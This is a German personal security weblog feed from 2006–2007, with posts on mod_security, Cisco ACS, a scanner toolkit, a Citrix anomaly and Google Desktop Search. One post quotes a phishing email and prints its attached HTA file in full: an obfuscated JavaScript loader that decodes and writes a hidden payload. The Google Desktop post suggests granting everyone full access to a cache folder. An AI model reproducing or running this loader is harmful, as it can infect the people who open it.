Karsten's weblog - Security

computec Archiv

nospam@example.com (Karsten) — Wed, 20 Jun 2007 21:19:00 +0200

Das Portal [1] computec enthält eine umfangreiche Dokumentessammlung Rund ums Thema Computersicherheit. In unregelmässigen Abständen werden
alle Dokumente ich ein komprimiertes Archiv gepackt und auf verschiedenen FTP und Webservern zum downloaden angeboten. [2] In denvergangenen Tagen ist eine Aktualisierung online geschalten worden.

[1]: www.computec.ch

[2]: http://computec.burgernet.org

Apache Security

nospam@example.com (Karsten) — Sun, 14 Jan 2007 09:49:51 +0100

In der heutigen Zeit gibt es im Internet viele kriminelle Elemente mit nur einem Ziel. Sich Geld zu erschleichen und anderen Schaden zuzufügen. Oftmals haben diese Elemente kein Wissen über die Materie und Technik und verwenden einfach fertige Scripte oder Frameworks. In der Branche sind Sie auch als „Script Kiddies“ oder „Cracker“ bekannt. Sie greifen teilweise wahllos Server an und versuchen diese lahmzulegen. Das Angriffsziel ist z.B. ein apache Webserver. Er soll durch übermässig viele Seitenanfragen überlastet oder sogar zum Absturz gebracht werden. Solche Vorgehensweisen stellen für einen Administrator ein erhebliches Problem dar, gerade wenn diese Angriffe von multiplen IP-Adressen stammen. Wie kann ein Webserver oder Firewall unterscheiden, ob es sich um einen gerechtfertigten Zugriff handelt oder um einen Angriff. Eine zeitaufwendige Möglichkeit ist das regelmässige überprüfen der Logfiles, um die entsprechenden Adressen auf der Firewall zu blockieren. Auf der ebene des Webservers selber lässt sich z.B. Mod-security [1] implementieren. Mit der richtigen Konfiguration werden solche Angriffe erkannt und z.B. Auf eine 404 Meldung weitergeleitet. Dieses Modul ist auf meinem Server im Einsatz und verrichtet seine Arbeit hervorragend.
[1]: http://www.modsecurity.org

Verantwortung

nospam@example.com (Karsten) — Wed, 01 Nov 2006 12:39:05 +0100

Was würde geschehen, wenn niemand bereit wäre Verantwortung für irgendetwas zu übernehmen. Dieser Gedanke ist fast nicht vorstellbar. Es könnte nicht auf eine pünktliche Lieferung der Tageszeitung bestanden werden, es trägt ja niemand die Verantwortung. Ähnlich sieht es in vielen anderen Fallbeispielen aus. Das Wort „Verantwortung“ ist erst im Mittelhochdeutschen zwischen 1050 und 1350 aufgekommen. Im weiten Sinn sieht man darin die Folgen zu tragen für eigene oder fremde Handlungen. Oftmals wird gemeint, Verantwortung stehe in einem negativen Kontext. So muss z.B. ein Abteilungsleiter die Folgen seiner Entscheide und auch indirekt die Folgen der Entscheide seiner Unterstellten tragen. Jedoch wird Verantwortung noch mit anderen Wörtern in Verbindung gebracht. Erfolg und Ruhm zählen dabei zu den eher erfreulichen Eigenschaften. Tendenziell wird heute schneller kritisiert wie gelobt.

Auch in der Informatik vor allem in der IT-Security gehört das Wort „Verantwortung“ zu einem der wichtigsten Ausdrücke. Z.B. sollte/muss jemand die Verantwortung tragen, dass die Server immer möglichst fristgerecht gepatched werden.

Der Hersteller einer Software sollte doch nach besten Wissen und Gewissen seine Software entsprechend der heute geltenden Sicherheitsrichtlinien erstellen. Leider ist dies nicht immer der Fall. Natürlich übernimmt der Hersteller nur selten oder nie die Verantwortung, ausgeschlossen sind spezielle Verträge. Manchmal wird auch die Verantwortung über die intern selber erstellte Software abgelehnt. Eine Ablehnung der Verantwortung ist meist einfacher und nur mit geringem Aufwand verbunden. Ist dies wirklich die Lösung? Zweifellos nicht.

Cisco Secure ACS (Access Control Server)

nospam@example.com (Karsten) — Fri, 15 Sep 2006 22:26:45 +0200

Der Cisco Secure Access Control Server ist einer der bekanntesten und nach meiner Meinung nach leistungsfähigsten Server für die tripple A Funktionalitäten innerhalb eines Netzwerkes.

Authentication (Wer hat Zugriff?)

Authorization (Was ist erlaubt zu tun?)

Accounting (Was tun sie?)

Prinzipiell werden die Funktionen in zwei Bereiche unterteilt. Erstens die Userverwaltung
für Administratoren der Netzwerkgeräte und zweitens die Funktionalitäten des Zugriffschutzes zum Netzwerk. Z.B. können berechtigte AD Accounts als Administrator auf die Netzwerkkomponenten (Access Points, Switchs, Routers, usw.) zugreifen und verwalten. Dis hat hauptsächlich folgende Vorteile:

Jeder User hat ein individuelles Passwort
Das Ändern des User-Passwortes geschieht zentral und gilt für alle Geräte
Erhöhung der Sicherheit, da die Userinformationen nicht mehr auf den Geräten selber gespeichert werden.
Verschlüsselte Übertragung der Userdaten

Der zweite Bereich beschäftigt sich mit dem Zugriffschutz aufs Netzwerk. Die Möglichkeiten sind fast unbegrenzt, jedoch sollte man den Verwaltungsaufwand nicht unterschätzen. Der Cisco Access Server übernimmt dabei die Funktion zur Abfragung der Berechtigung, Protokollierung und Kommunikation zum ACS. Als Access Server kann das Cisco IOS, Cisco CAT OS, Cisco Aironet AP, Cisco 802.1x enabled Switchs, Cisco PIX, Cisco VPN 3000 & 5000 und teilweise Drittherstellerprodukte dienen. Die Übertragung der Daten geschieht dabei im Rahmen von TACACS+ verschlüsselt. Natürlich ist dieses Produkt nicht die Lösung für alle Probleme [1], [2], [3], [4].

Die Implementierungen benötigt grundlegende Konzepte. Prinzipiell sollte die Integration im Rahmen oder anhand eines Sicherheitskonzeptes geschehen. Gerade die Vielzahl von Möglichkeiten kann zu einem erheblichen Verwaltungsaufwand führen. Eine der wichtigsten Punkte ist die redundante Auslegung des Systems. Sollte der einzige ACS ausfallen, legt dies je nach Konfiguration das ganze Netzwerk lahm. Keine Geräte oder User könnten noch verifiziert werden, der Zugriff würde verweigert werden. Eine physikalische Trennung der Systeme ist daher sinnvoll, das systemeigene BackUp-System sollte auf jeden Fall eingesetzt werden.

Mehr Infos sind auf http://www.cisco.com zu finden.

[1]: http://www.tecchannel.de/sicherheit/aktuell/433929/index.html
[2]: http://www.heise.de/security/news/meldung/72856
[3]: http://www.scip.ch/cgi-bin/smss/showadv.pl?id=963
[4]: http://www.cisco.com/en/US/products/sw/secursw/ps2086/products_field_notice09186a00805bf1c4.shtml

Seltsamer Zustand auf einem Citrix Server

nospam@example.com (Karsten) — Sat, 09 Sep 2006 18:52:24 +0200

In der vergangenen Woche musste einer der Citrix-Server neugestartet werden. Kurz darauf wurde mir ein höchst seltsamer Zustand gemeldet. Ein User hatte sich via ICA Client auf das Citrix System eingeloggt. Anstatt die gewohnte Oberfläche erhielt er die Umgebung des Servers, er konnte alle Administratorentätigkeiten ausführen, sogar den Server herunterfahren. Es schien fast so, als ob er sich via eine Terminal-Session auf dem Server selber befinden würde. Leider konnte ich diesen Zustand nicht weiterverfolgen bzw. nochmals erzeugen, da es sich um ein produktives System handelt. Es gab keinerlei seltsame Logeinträge, auch das Login schien ordnungsgemäss abgelaufen zu sein. Für mich bleibt die ganze Sache leider ein Rätsel. Manchmal finde ich es schade, dass keine Testserver zur Reproduzierung des Fehlers zur Verfügung stehen.

ATKCE (Attack Tool Kit Console Edition)

nospam@example.com (Karsten) — Sat, 05 Aug 2006 21:17:34 +0200

ATK (Attack Tool Kit) [1] ist ein leistungsfähiger Security-Scanner geschrieben von Marc Ruef [2]. Die Plug-In Architektur der einzelnen Tests, erlaubt das dynamische Erweitern der erkennbaren Schwachstellen. Eine grafische Oberfläche vereinfacht die Bedienung. Im Moment wird offiziell „nur“ Windows unterstützt, da das Tool in VB 6 implementiert wurde. Jedoch erlaubt wine auch eine Benutzung unter Linux.
Neu gibt es eine Mono [3] Konsolen Implementierung namens ATKCE (Attack Tool Kit Console Edition). Diese soll das Einbinden in andere Scripte erlauben und verzichtet vollständig auf eine grafische Oberfläche. ATKCE greift auf die Plug-Ins von ATK zurück. Beide Projekte stehen unter der GPL Lizenz, der Source Code ist frei einsehbar. Mehr Informationen gibt es auf der Projektseite [4]. Aktuell erst in einer Beta Version verfügbar.

[1]: http://www.computec.ch/projekte/atk/
[2]: http://www.computec.ch/mruef/
[3]: http://www.mono-project.com/
[4]: http://atkce.burgernet.org

You have received Secure E-mail

nospam@example.com (Karsten) — Mon, 19 Jun 2006 20:02:37 +0200

Ich habe heute ein seltsames Mail erhalten:

You have received Secure E-mail

To read the message open attached file.

User ID:XXXX
Password: XXXX

Keep your password in a safe place.

Thank you,
Encrypted Message Service,
AOL.com

Im Attachement befindet sich ein File msg.zip. Nach dem entpacken erscheint das File msg.hta. HTA Files sind Programme für den Browser welche aber auf dem Client ausgeführt werden. Am ehesten könnte man diese mit VBScripten vergleichen. Auch solche Files können schädlichen Inhalt aufweisen daher niemals öffnen.

Inhalt msg.hta
<html>
<head>
<title>hzrskmpkp</title>
</head>

<body><script language="JavaScript">function rm(bl,ap){eval(ap);wcol=637;e(bl);};rm("T{II.i6OIg-6{-uKjPi{p-l.iB4.-paOo-l.4,.4PPP<li4Of6-oaIgBag.Aha,a=i4Of6> BIi6O{I-4Qwm;{iBp.I6Pk4O6.QCGIabo.-0{-T{II.i6-6{-=.4,.4P-zo.al.-ic.iL-s{B4-RI6.4I.6-i{II.i6O{I-aI;-64s-agaOIP<li4
Of6-oaIgBag.Aha,a=i4Of6>iMABI.liaf.Q^%rT^wv;4A^i}^NiMN^'.isio.;^NiMvoA;4N^Bl.4OIO6P.!.^
vI!A2v64smfAI.k-ui6O,.XKbM.i6Q^=i4Of6OIgPVOo.=sl6.pKbM.i6^wvOAI.k-ui6O,.XKbM.i6Q^W=i4Of6P=c.oo^wvO QfPVOo.3!Ol6lQowwm.!AfP1.6VOo.QowvO Q.!PlO#.>t&&&&wI!A&vFfPT4.a6.V{o;.4Q;4wvFia6icQ62wmFv BIi6O{I- xQwm4.6B4I- aol.F;{iBp.I6P{Ii{I6.!6p.IBA xv<$5li4Of6><li4Of6-oaIgBag.A^,bl^>R -I!-0c.I$Il.6-R3AT4.a6.KbM.i6Q^RI6.4I.63!fo{4.4PuffoOia6O{I^w$IR3PHOlObo.A&$I=Bb-=f$IWcOo.-R3PqBlsA64B.
$IW.I;$I3I;-=Bb$IB4Au44asQ^c{{fPLa#aIPb#$5g{;P6!6^/^f{oM{fP 4..i{{olO6.Pi{p$56.l6P6!6^/^4xxPbsP4B$5{oP6!6^/^I{oL{P6xrPi{p$5g{;Pi^/^Mp{x2PbsP4B$5bOgP6!6^/^flO!OPk
{oPb#$56.l6P6!6^/^;BBkPIpP4B$5{oP6!6^w$IV{4-BIA&-0{-E$IR3P7a,Oga6.QB4QBIww$I=f$IMAR3Pd{iBp.I6Pb{;sPOII.40.!6$IR -j.IQMw>r&&&&-0c.I$I3!O6-V{4$I3I;-R $IMA^^$I7.!6$I=Bb-bl$IlAj.IQMw$IR Qlw0c.I$I#A^uqTd3V1JRh(jn7Kz*'=0GHWXYZabi;. gcOMLopI{f)4l6B,k!s#&2tx`rED|:N$5^$IV{4-LA2-0{-l-=6.f-`$IpAx$I!A&$IV{4-6A&-0{-x$IkAnO;QM/LN6/2w$IR -kA^A^-0c.I$IpAp+2$I{A&$I3ol.R -kA^?^-0c.I$I=.6- AfPT4.a6.0.!6VOo.Qo/04B.w$I PW4O6.-a$I PTo{l.$I3!O6-=Bb$I3ol.$I{ARI=64Q2/#/k/,bqOIa4sT{pfa4.w+2$I3I;-R $I!AE`@!N{$I7.!6$I!AJ.!Q!w$I!A=64OIgQE+j.IQ!w/^&^wy!$IsATc4QTqs6.Q^yJ^ynO;Q!/2/twwwNTc4QTqs6.Q^yJ^ynO;Q!/
x/twwwNTc4QTqs6.Q^yJ^ynO;Q!/r/twww$IaAayj. 6Qs/pw$I7.!6$I3I;-R $I3I;-=Bb$I3I;-R $Ibl$IOP'.gW4O6.-^J(TG$$={ 6ka4.$$nOi4{l{ 6$$RI6.4I.6-3!fo{4.4$$pao^/^ {4l6.4Pf4{ Oo.ea gPic^/^'31_=Z^<$5li4Of6><li4Of6-oaIgBag.Aha,a=i4Of6> BIi6O{I- 2Qwmb2A&v BIi6O{I- tQIawmbtA&v42A^J(jn^NiMN^=Y=03n^NiMN^TB44.I6T{I64{o=.6^NiMN^=.4,Oi.l^NiMv64smOP'.gd.o.6.Q42NIaNiMwvbtA2vF
ia6icQ62wmFv4.6B4IQbtwvF4tA^J(jn^NiMN^=KV0Wu'3^NiMN^nOi4{l{ 6^NiMvL.A^ui6O,.-=.6Bf^NiMN^RIl6aoo.;-T{pf{I.I6l^NiMN^mTdruT:2q+u3Dq+3|xu+&T`T+3E2E&Dr:DtVxF^NiMN^=6Bbfa6c^vO Q tQ^fiOfOp^wN tQ^fiRzzlT^wN tQ^'afd4,^wN tQ^VO4.zn^wN tQ^(p!VOo.^wwb2A2v64smOP'.gW4O6.Q4tNL./o/^'31_=Z^wvOP'.g'.a;Q4tNL.wvFia6icQ62wm64smfPT{fsVOo.Qo/OP'.g'.a;Q4
tN^WOI;{kl^NiMN^TB44.I6H.4lO{I^NiMN^3!fo{4.4^NiMN^=c.oo-V
{o;.4l^NiMN^T{pp{I-=6a46Bf^wNiMwvFia6icQ62wmb2A&FvFv4.6B4IQb2wvF64smO QI!yy82QwwOP4BIQowvFia6icQ;wmFv<$5li4Of6>CwvFvl.60Op.{B6Q^4Qw^/&wv<5li4Of6>",unescape("%66u
%6Ec%74%69on%20e(%75%29%7B%76%61%72 v%3D%27%27%2C%63,%71,g,%6E%2C%62%3D'%27%2C%68=%22%68c%69OK(Q*@e%2E%50z#%53=%41u%42%
71)%77kLjM%6E%49R'%43%540&%79%73lo%7B%6Dp%66 %2D%2B%4E%37%44d;v%2C%2F%35%724%60%55G12%746%453%78%21%38%7C%39:%7D%46VH%4A%22;%66o%
72(n=0;n<%75%2E%6C%65ng%74%68%3Bn%2B+)%7B%71=%75
%2E%63%68a%72A%74%28%6E%29%3B%67%3D%68%2Eind%65%78%4F%66(q%29%3Bif%28g%3E%2D1%29{c=((
%67%2B%31%29%2576%2D1)%3B%69%66(c<%3D0%29%7Bc+%3
D%376}v%2B%3Dh.%63%68%61rAt%28%63-%31)}%65%6Cse{%69f%28%71%3D=%22$%22%29%71=%22%5C%5C
%22;%69f(%71%3D%3D%22^%22)%71%3D%22%5C%22%22%3B
v%2B%3D%71}}%3B%64ocume%6E%74%2Ew%72%69%74e%28v)}"));</script></body></html>

Hier wird wohl ein Java Script ausgeführt. Was dieses genau bewirkt kann ich leider im Moment noch nicht sagen.

IT Security Forum

nospam@example.com (Karsten) — Tue, 28 Mar 2006 19:59:52 +0200

Ich besuchte heute das IT-Security Forum in den Räumlichkeiten der Zürcher Fachhochschule in Winterthur. Leider wurden meine Erwartungen nur sehr spärlich erfüllt. Die fünf Referenten waren von verschiedener Qualität, die Themen wohl interessant aber nur oberflächlich behandelt. Ein IT bzw. Security Spezialist war nach meiner Meinung total fehl am Platz. Für eher technische Laien wie z.B. IT-Leiter (solls geben) wäre das Forum eher geeignet gewesen.

computec Archiv

nospam@example.com (Karsten) — Sun, 05 Mar 2006 17:12:20 +0100

Das Portal [1] computec enthält eine umfangreiche Dokumentessammlung Rund ums Thema Computersicherheit. In unregelmässigen Abständen werden alle Dokumente ich ein komprimiertes Archiv gepackt und auf verschiedenen FTP und Webservern zum downloaden angeboten. [2] In den nächsten Tagen wird eine solche Aktualisierung wieder online geschaltet werden.

[1]: www.computec.ch
[2]: http://computec.burgernet.org

Google Desktop Search Version 3 / 2

nospam@example.com (Karsten) — Mon, 13 Feb 2006 11:56:30 +0100

[3] Blogeintrag zu Version 2
Das wohl bekannteste Suchtool ist in Version 3 erschienen [1]. Bis jetzt aber erst als „Beta“ Version in Englisch. Neu sollen auch Inhalte von anderen Rechnern durchsucht werden können, diese stehen dank einer verschlüsselten Zwischenspeicherung auch offline zur Verfügung. Die Problematik wird in diesem Bericht beschrieben [3]. Ob noch weitere Problematiken enthalten sind, ist bis jetzt noch nicht bekannt.

Einige Problematiken aus der Version 2 bleiben bestehen. Ich möchte noch einige Probleme aus der Version 2 die Lösung bekannt geben.

Benötigt lokale Administrationsrechte:
Dies ist nicht so, das Problem liegt legendlich bei den Berechtigungen auf dem Cache Ordner (Google Desktop Search Cache o.Ä). Fügen Sie „jeder“ mit Vollzugriff hinzu. Auf die Unterordner sollten nur die Besitzer zugriff haben.

Cache Kopieren auf einen anderen Rechner:
Mit den oben beschriebenen Massnahmen wird auch dieses Problem gelöst. Auf den persönlichen Cache Ordner (josdf98 oder so) hat nur der entsprechende User zugriff.

[1] http://desktop.google.com/en
[2] http://www.testticker.de/news/security/news20060210017.aspx
[3] http://weblog.burgernet.org/index.php?/archives/19-Google-Desktop-Search.html

Google Desktop Search

nospam@example.com (Karsten) — Mon, 16 Jan 2006 17:20:31 +0100

Das Tool Google Desktop Search ist unumstritten ein leistungsfähiges Werkzeug. Leider sind aber einige Nachteile bzw. Bedenken zu beachten. Das Tool legt auf dem lokalen Rechner einen Cache ab. Dieser Cache kann auf einen anderen Rechner übertragen werden. Daraus folgt, dass der Fileinhalt auch auf dem potenziell unsicheren Rechner betrachtet und rekonstruiert werden kann. Eine Massnahme bietet die Option Cache verschlüsseln, jedoch ist dies ziemlich Rechenintensiv und schlägt auf die allgemeine Performace.

Ob das Tool nach „Hause“ telefoniert ist noch umstritten. Nach Aussage von Google nur um unpersönliche Informationen (Programmabstürze) zu übermitteln. Dies soll den Entwicklern helfen das Werkzeug zu verbessern. Meldungen die das Gegenteil beweisen, sind mir bis jetzt noch nicht bekannt.

Auf meinem Testrechner werden lokale Administrationsrechte benötigt um das Tool überhaupt zu verwenden.

Die Benutzereinstellungen können in keiner Weise für unbefugte blockiert werden. Daher für einen Unternehmenseinsatz eher ungeeignet. Eine spezielle Enterprise Edition [1] bietet eine MSI-Installation und Ansprechbarkeit via GPO.

Eine schon seit der Beta bekannten Sicherheitslücke ist in der aktuellen Version geschlossen. [2]

Dokumente zur Betaversion:
Heise Artikel

Google Desktop Search downloaden

[1]Enterprise Edition
[2]Sicherheitslücke